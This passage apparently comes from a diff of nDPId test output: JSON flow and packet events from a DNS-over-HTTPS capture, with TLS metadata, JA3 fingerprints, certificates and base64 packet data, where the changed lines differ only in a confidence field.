AKPkytzCjXINk0eKUkCZXrW9QupQw5YZCi9c+zr9e6Nsrg4KBkr13ePLbPEqhzK0TgphOe\/BgDw39ES3e0uIMvXuKrcPIZlkW8iZdSPWqT0Pls1rgFcXIxjJuZzAKdz9RIDjZGrpzpHXAzwarf0m0i2Gtw3bYKFHdkTT5n1uaYQthMuQHJHi+p8XDFtekQax3jKJD3CiZg+YeLzJ5Uo0iEidZKe5rH7ZzgkT8O0rVZwq5niGJgbiV3EUpPldHNKypyvkj3ycT9kY2IJU7ZpXJRnpDRxjhVDO4G\/kK6jqgKdwB9YrN8ddL2ErNeFlxtrqM8tHt2ZYdSMZYCnp2omvPy97RCe3Cp\/HGnLxpRs+DW569z8h8BSfI\/zMEZeQ4RsdRgF8hz+rQ8SRDGvtaqUblOPSNlurg9vSpcyYw7DcuCxkCASBOvLXbWh8As7fT8An8+JscVf\/lq\/mGQvDlSuFNj+tDMXoI0ZKapFzG\/KPdLhwKgFCipECC9Er6NeMVnAw07Z3oto50ydjbh57kzukh0zqDBLZjEhtFpoAiVBqZg7B50ytdFgK+6hZgsHjVoNuFRf32MJngr13fBBtHKo\/VHaVg4drs9W9DfAL1w5rtOMVsX6aUt1YAeiwdGBNEPyNmvNCcEQOj+xzMfVoOLm7SUXFyIm1n+reDHyXo8yNG7LkDYjmq\/JLkrpjl4bFeLBsdG760CBaEUCZJd3nvhfPPBsfCBF5PswuYpAEifKeZ17NlOaSrxj79WssKYt4uUKm2gm9JHcvNneM5n7DQEooPTVEVYNOgvXrRVlbfz+Cy2kBP2gCp+jUrcKx4YKGEhDuMaL8PfHGRT2vA7nqzUU9C3cJ3emOjaD7KMjipJvPBaA7U+L8ujhu2gJWLx4yY7mn3RV6K2HsrFjTJduvDGB+DqQg96t2CJjvMbpqIitN9hBxZbznMh3XU1HogwVfIbOe8Ug8cikY7ag9rW6E1CfeBwa9CM8u9CTXlTgumW220WzI\/+S8CMvOup0C9PugMt2Jc4cXDvNs+dyRWH3X7QIImonFrQ6RaFIHlbDa5gqN+0VC87hnjQE8OUpxOAg1ReSXhcDAwEZLWp\/o3fXWPvp18ZXCuvlFC4i5H\/0jL\/Tq956IZziJu\/XhSjlSr056BPu7zKCegDZWzYsK6oLPWAfcvtcSfAPACHpLE+JYCNMevr7LjdkYBxYeJsjktZDgoEi7lSxc1XaPOcOHuKcNBIZPhHzY\/jpu14RecKRjxP8M4PlZTTXUvzf286xa1A7FPGcV7e6"} -00950{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":455,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739400581,"flow_last_seen":946739400612,"flow_idle_time":7580000,"flow_min_l4_payload_len":287,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3191,"flow_avg_l4_payload_len":1595,"midstream":1,"thread_ts_msec":946739400612,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.70.85.11","src_port":54164,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": 
{"version":"TLSv1.3","client_requested_server_name":"doh.bortzmeyer.fr","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00950{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":455,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739400581,"flow_last_seen":946739400612,"flow_idle_time":7580000,"flow_min_l4_payload_len":287,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3191,"flow_avg_l4_payload_len":1595,"midstream":1,"thread_ts_msec":946739400612,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.70.85.11","src_port":54164,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh.bortzmeyer.fr","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
00753{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":456,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":946739400612,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":268,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":268,"pkt_l4_len":234,"thread_ts_msec":946739400612,"pkt":"ZmZmZmZmRERERERECABFAAD+44BAADQGi2vBRlULCgAAAQG705Siz6CRpzc6clAYAfVAMQAA7MoGonW0Fj4lHArVaOCgJtbHn9aRY0n9LKnu3cTyqbChLhfccHsdC81z2fZ+Ukv\/nAuBoKACJX8Pwem5JBIGeQ+hR9gvbJqO0dljTEjfnQJGlcWyJk4FqoFjayNoVLdbRg\/yWeK8VeLtflQjLxqwMpDM\/QbduG5HAuBrFrE4C7dTGq1PezTGhU9pqGsXAwMARb1ScBcpf\/m81VPRA3LW\/2mv0IZmicbA7T0x5byJ5bKDeMQneniKc1y1kH9Jz7ueZz9IjjqOqk3CW8r0ZREMc3BCfYPYBQ=="} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":469,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400702,"flow_last_seen":946739400702,"flow_idle_time":7580000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739400702,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35714,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00848{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":469,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":946739400702,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":946739400702,"pkt":"REREREREZmZmZmZmCABFAAFILINAAH4GS1wKAAAB0frxGYuCAbtSRrNTwAekRVAYAfaFCwAAFgMBARsBAAEXAwMzpeRPPpmPOBWwlYuEr5uNgoasUYbxY5rOmYFKCjGtJyAIAEydch7b9cupGuDzo92xh9NLKrnQMxUlfE7nWZM5\/gAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACoAAAAFwAVAAASamFyamFyLm1lZ2FuZXJkLm5sAAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AIJeuQLdGEJN7n7Os\/LoZLYTlp1p11dddxIYAQZdOassB"} -00911{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":469,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400702,"flow_last_seen":946739400702,"flow_idle_time":7580000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739400702,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35714,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"jarjar.meganerd.nl","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00911{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":469,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400702,"flow_last_seen":946739400702,"flow_idle_time":7580000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739400702,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35714,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"jarjar.meganerd.nl","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 03224{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":470,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":946739400727,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":2102,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2102,"pkt_l4_len":2068,"thread_ts_msec":946739400727,"pkt":"ZmZmZmZmRERERERECABFAAgouN1AADcG\/yHR+vEZCgAAAQG7i4LAB6RFUka0c1AYAfWL6wAAFgMDAGYCAABiAwNagb8+u4y1yd1xwzS1nH\/nTUIdC4eY2A55MtUayrM8fyDO5yrWZS4Aa1iS7gSLPLT\/C8LAuC029TJv1sr4CTESSMAwAAAa\/wEAAQAACwAEAwABAgAFAAAAEAAFAAMCaDIWAwMKAwsACf8ACfwABWAwggVcMIIERKADAgECAhIDDKJHTnwjwsnrm2DLrI1zNLUwDQYJKoZIhvcNAQELBQAwSjELMAkGA1UEBhMCVVMxFjAUBgNVBAoTDUxldCdzIEVuY3J5cHQxIzAhBgNVBAMTGkxldCdzIEVuY3J5cHQgQXV0aG9yaXR5IFgzMB4XDTIwMDcxNDIzNDcyMVoXDTIwMTAxMjIzNDcyMVowHTEbMBkGA1UEAxMSamFyamFyLm1lZ2FuZXJkLm5sMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAv9OPyuZ6JwIE6bPDfiRhbYPMkVlSRq93tijiXoOFC9OQc4eXtoMomU6kKPy5Z0NTzEB3WAHxrA4SRx6q3\/yefPeWA8HsMuYfQZpftg95obbyxbYYejVTJGcDt7bBAbyfyHwpa9VQXCZ1NM6170XCwqiTXQ5pC
T67h001VbP663EnKohkf0MUwppbn6Q5xEFc+o+3D6IU\/rxkzW1SQTh0phbzb1Op8DfM63A\/ZtxaA5UoEOBp23CMkB\/vP5ul2uJharTqU\/BfvvV3HB\/zu9o43hkbooUEyMuBJn0+O6orVhwG1QVKM6xj5TM6ZcijU2+3rS+x7vNJUt\/bTHh7sHDviQIDAQABo4ICZzCCAmMwDgYDVR0PAQH\/BAQDAgWgMB0GA1UdJQQWMBQGCCsGAQUFBwMBBggrBgEFBQcDAjAMBgNVHRMBAf8EAjAAMB0GA1UdDgQWBBRLbCV+QerkMWgquQ7dzQvZqcefiTAfBgNVHSMEGDAWgBSoSmpjBH3duubRObemRWXv86jsoTBvBggrBgEFBQcBAQRjMGEwLgYIKwYBBQUHMAGGImh0dHA6Ly9vY3NwLmludC14My5sZXRzZW5jcnlwdC5vcmcwLwYIKwYBBQUHMAKGI2h0dHA6Ly9jZXJ0LmludC14My5sZXRzZW5jcnlwdC5vcmcvMB0GA1UdEQQWMBSCEmphcmphci5tZWdhbmVyZC5ubDBMBgNVHSAERTBDMAgGBmeBDAECATA3BgsrBgEEAYLfEwEBATAoMCYGCCsGAQUFBwIBFhpodHRwOi8vY3BzLmxldHNlbmNyeXB0Lm9yZzCCAQQGCisGAQQB1nkCBAIEgfUEgfIA8AB3AF6nc\/nfVsDntTZIfdBJ4DJ6kZoMhKESEoQYdZaBcUVYAAABc0\/ws2wAAAQDAEgwRgIhAMWgM8fCSKocSMS6vNmRTIKDzMWXKgtHRh\/4TftRR0QHAiEA3JSerrntM9u7waurWrvwybuL6dB9RsJnzjR8MMY9tuIAdQAHt1wb5X1o\/\/Gwxh0jFce65ld8V5S3au68YToaadOiHAAAAXNP8LOOAAAEAwBGMEQCIG6J2T+qpPVVFxjS27cFglwKmn3u\/zi2QCL4kFgVvwefAiAZm3eKKyeMogTwUuYzbx+RsfIEqA9nNOdkRRv\/z1FxuzANBgkqhkiG9w0BAQsFAAOCAQEAcAija84yR1ADOoiyrdQFCgxJZB2BUUNBtRgi8ZPFZIdUaVPomyGL3oK59c6IO+gMw6xbSeGsLaVjettLRMJ2uMl6JZkgjV1Bhp3NdPQKieFpoaEiEBUAwqL8TSBKdJ\/mAMQLAKadqZ1hZKcVTPtXVdd5Q28iLasE\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\/z0HhncchpDpWRz\/7mmelgPEjMfspNdxIknUcbWuu57B43ABycrHunBerOSuu9QeU2mLnL\/W08lmjfIypCkAyGdGfIf6WauFJhFBM\/ZemCh8vb+g5W9oaJ84U\/l4avsNwa72sNlRZ9xCugZbKZBDZ1gGusSvMbkEl4L6KWTyogJSkExnTA0DHNjzE4lRa6qDO4Q\/GxH8Mwf6J5MRM9LTb44\/zyM2q5OTHFr8SNDR1kFjOq+oQpttQLwNh9w5MCAwEAAaOCAX0wggF5MBIGA1UdEwEB\/wQIMAYBAf8CAQAwDgYDVR0="} 
-00968{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":470,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739400702,"flow_last_seen":946739400727,"flow_idle_time":7580000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":2048,"flow_tot_l4_payload_len":2336,"flow_avg_l4_payload_len":1168,"midstream":1,"thread_ts_msec":946739400727,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35714,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"jarjar.meganerd.nl","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"2464432ec440b95b36263230c3148d11","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00968{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":470,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739400702,"flow_last_seen":946739400727,"flow_idle_time":7580000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":2048,"flow_tot_l4_payload_len":2336,"flow_avg_l4_payload_len":1168,"midstream":1,"thread_ts_msec":946739400727,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35714,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"jarjar.meganerd.nl","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"2464432ec440b95b36263230c3148d11","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
02460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":471,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":946739400727,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1535,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1535,"pkt_l4_len":1501,"thread_ts_msec":946739400727,"pkt":"ZmZmZmZmRERERERECABFAAXxuN9AADcGAVfR+vEZCgAAAQG7i4LAB6xFUka0c1AYAfWJtAAADwEB\/wQEAwIBhjB\/BggrBgEFBQcBAQRzMHEwMgYIKwYBBQUHMAGGJmh0dHA6Ly9pc3JnLnRydXN0aWQub2NzcC5pZGVudHJ1c3QuY29tMDsGCCsGAQUFBzAChi9odHRwOi8vYXBwcy5pZGVudHJ1c3QuY29tL3Jvb3RzL2RzdHJvb3RjYXgzLnA3YzAfBgNVHSMEGDAWgBTEp7Gkeyxx+tvhS5B1\/8QVYIWJEDBUBgNVHSAETTBLMAgGBmeBDAECATA\/BgsrBgEEAYLfEwEBATAwMC4GCCsGAQUFBwIBFiJodHRwOi8vY3BzLnJvb3QteDEubGV0c2VuY3J5cHQub3JnMDwGA1UdHwQ1MDMwMaAvoC2GK2h0dHA6Ly9jcmwuaWRlbnRydXN0LmNvbS9EU1RST09UQ0FYM0NSTC5jcmwwHQYDVR0OBBYEFKhKamMEfd265tE5t6ZFZe\/zqOyhMA0GCSqGSIb3DQEBCwUAA4IBAQDdM9cR82NYON0YFfsJVb52VrlwSKVpRyd7wiQIkvFaH0oSKTckdFEcYmi4zZVwZ+X3pLxOKFHNm+iuh53q2LpaoQGa3PDdah1q2D5XI56mHgRimv\/XBcq3Hz\/ACki8lLC2ZWLgwVTloyqtIMTp5rvcyPa1wzKjmMx3qOZ5ZQcryyj+OhZSgc5SDC5fg+jVBjP7d2zOQOoynh+SXEHBdGxbXQpfM8xNn6w48C97LGKd2aORbyUbL5CxGUY99n4bpnqHuaN6bRj6JaWRhxXg8hYvWLAGLyxoJsZLmM3anwz5f5DtQ0oSRE5vc3oo6qSqbntMfYfd4MkCRKeHr8M0W7RCFgMDAhcWAAITAQACDzCCAgsKAQCgggIEMIICAAYJKwYBBQUHMAEBBIIB8TCCAe0wgdahTDBKMQswCQYDVQQGEwJVUzEWMBQGA1UEChMNTGV0J3MgRW5jcnlwdDEjMCEGA1UEAxMaTGV0J3MgRW5jcnlwdCBBdXRob3JpdHkgWDMYDzIwMjAwOTA0MDA0OTAwWjB1MHMwSzAJBgUrDgMCGgUABBR+5mrncpqz\/PiiIGRsFqEtYHEIXQQUqEpqYwR93brm0Tm3pkVl7\/Oo7KECEgMMokdOfCPCyeubYMusjXM0tYAAGA8yMDIwMDkwNDAwMDAwMFqgERgPMjAyMDA5MTEwMDAwMDBaMA0GCSqGSIb3DQEBCwUAA4IBAQAoMB1ePZKC8NpTy2434kCI6h8NAXGSDejnRZYFr2QSx+TpoZipUWbMWCq8UzrMIxKC8UJACJQc6RIM+Xgz0ZRbGx25OD3V4vLxsczn\/nEIsXCHGvGoEBJqPqesQfpmU9r+oB2CbUgxGaJxDFqnidG6tH5KNxFVbrX2lPzXeDzKwLN1eUiZU\/lMuAOJwkK8zmwVXP5H7g6aco+MiZp06K8b\/Da3w0YGUY9fjEablMtV5ViuxARhZw1pWYWZo\/jGfvICDNvPKmx8V1X1Z4R8rNjm8UiPRR8P0NarasVvNtWs+6fXGpl\/h
FMZzj6z4oAVh0vYNXKYxmaDs8l6pH8OOZ\/cFgMDASwMAAEoAwAdIBuLZjnTB3Kjce7+mNxfaBiRgPo4iNkyTjzm6+fh98MBCAQBAAD35z4OurpaleuYyQXrRwgunZx5itw99f\/qns7fqVRPpCakkPBqYtIkrAQds7t3x9gcyB3pN\/ek7QU4lXsRRnsrWpFsVpkkgouj8noQcYPmvp55cuzOEjLxYK5KOB1bU10ZmdANW3hMqgjTathZk6jfjNOD8MgF15uckgPUXOITOpG7UYd\/YtxRx7xgMGY0jlH\/+xeUF+NSAiy6s9oSi0oU\/QlatPOidPhVmRC84vWQNkgJhZubcKWseKLjiRRL9zUmMJ2fjig0R0EKUVh0pAUSNWsA0m3x1YIPV6kX\/fzGNkCBx4kijVkxENgEgAD9si+WguAjMtSH5qQYN0CMxwsWAwMABA4AAAA="} -01301{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":471,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":946739400702,"flow_last_seen":946739400727,"flow_idle_time":7580000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":2048,"flow_tot_l4_payload_len":3817,"flow_avg_l4_payload_len":1272,"midstream":1,"thread_ts_msec":946739400727,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35714,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"9": {"risk":"TLS Cert Expired","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"jarjar.meganerd.nl","server_names":"jarjar.meganerd.nl","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"2464432ec440b95b36263230c3148d11","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3","subjectDN":"CN=jarjar.meganerd.nl","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"17:C9:8C:F5:DD:1F:0E:0F:DC:C5:42:4F:ED:C4:CD:57:5A:5D:7A:4F"}} 
+01301{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":471,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":946739400702,"flow_last_seen":946739400727,"flow_idle_time":7580000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":2048,"flow_tot_l4_payload_len":3817,"flow_avg_l4_payload_len":1272,"midstream":1,"thread_ts_msec":946739400727,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35714,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"9": {"risk":"TLS Cert Expired","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"jarjar.meganerd.nl","server_names":"jarjar.meganerd.nl","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"2464432ec440b95b36263230c3148d11","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3","subjectDN":"CN=jarjar.meganerd.nl","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"17:C9:8C:F5:DD:1F:0E:0F:DC:C5:42:4F:ED:C4:CD:57:5A:5D:7A:4F"}} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":486,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739401864,"flow_last_seen":946739401864,"flow_idle_time":7580000,"flow_min_l4_payload_len":292,"flow_max_l4_payload_len":292,"flow_tot_l4_payload_len":292,"flow_avg_l4_payload_len":292,"midstream":1,"thread_ts_msec":946739401864,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"95.216.229.153","src_port":43888,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00855{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":486,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":946739401864,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":346,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":346,"pkt_l4_len":312,"thread_ts_msec":946739401864,"pkt":"REREREREZmZmZmZmCABFAAFMN1VAAH4GvigKAAABX9jlmatwAbtGU6iimu8Jz1AYAfYHbQAAFgMBAR8BAAEbAwOH23fm3DrJaQXLovxzyYyk5R\/PesPVPPqPMsnNPw9NhCA+BKUjIeM9NnmcNXI7jO56RaAWoMnCcXIJRfPvBK89HQAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACsAAAAGwAZAAAWZmkuZG9oLmRucy5zbm9weXRhLm9yZwAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACAgB93oNekrupxQPrzRHifFos9GGTUaOGYLuLqXCSqLFg=="} -00915{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":486,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739401864,"flow_last_seen":946739401864,"flow_idle_time":7580000,"flow_min_l4_payload_len":292,"flow_max_l4_payload_len":292,"flow_tot_l4_payload_len":292,"flow_avg_l4_payload_len":292,"midstream":1,"thread_ts_msec":946739401864,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"95.216.229.153","src_port":43888,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fi.doh.dns.snopyta.org","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00915{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":486,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739401864,"flow_last_seen":946739401864,"flow_idle_time":7580000,"flow_min_l4_payload_len":292,"flow_max_l4_payload_len":292,"flow_tot_l4_payload_len":292,"flow_avg_l4_payload_len":292,"midstream":1,"thread_ts_msec":946739401864,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"95.216.229.153","src_port":43888,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fi.doh.dns.snopyta.org","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 04384{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":487,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":946739401922,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":2958,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2958,"pkt_l4_len":2924,"thread_ts_msec":946739401922,"pkt":"ZmZmZmZmRERERERECABFAAuALHhAADcGBdJf2OWZCgAAAQG7q3Ca7wnPRlOpxlAQAfURoQAAFgMDAHoCAAB2AwPibR+Wkzsx56DJDm5Eu1YLQR+8sKrid6w\/L4hLlzFi7CA+BKUjIeM9NnmcNXI7jO56RaAWoMnCcXIJRfPvBK89HRMCAAAuACsAAgMEADMAJAAdACBuK8qBa63Irnemz8DqNJ321mRXUwu2HpEN9mUutJb4PxQDAwABARcDAwAkUOaHYP5iZ2NNWAzfU4nuMAsSlIi3Xu6evUH+ePghzyW3lf1oFwMDDTdyOxvGAqdaXqn7mk56YQOkftztBpxUe9++1VUjQL0UTPE4dDghDlADUJrVIMNoajw7OVNVUJlwwZLv4SY0Vx3I7ELfEhgQAcbo8KTKAm9O2ms4MsOpGyCQp3Ck5bHL2bE4iiWi1kZ3XUOEqkWhVOIsnrRavV3YbdvOPn4o+EZD19BNo16d7FYA9cwlYFl0b+UOCHVkbAV5Ro0aksFmIDr9nN\/SKS5iC8KA1HQko\/XCtoZt\/uj26L8Jnm5j0xvi5PCt7eYN7FAf9foi+urRIknTbj0qt5H6t5n2fn2SPs3+74zq4arLW6Grk5JVfjN+EFn6r2Kqt2DBASpVLNRJlEJ\/bKKlz+O8J7CBDjbsuIjIaIhIezaNN
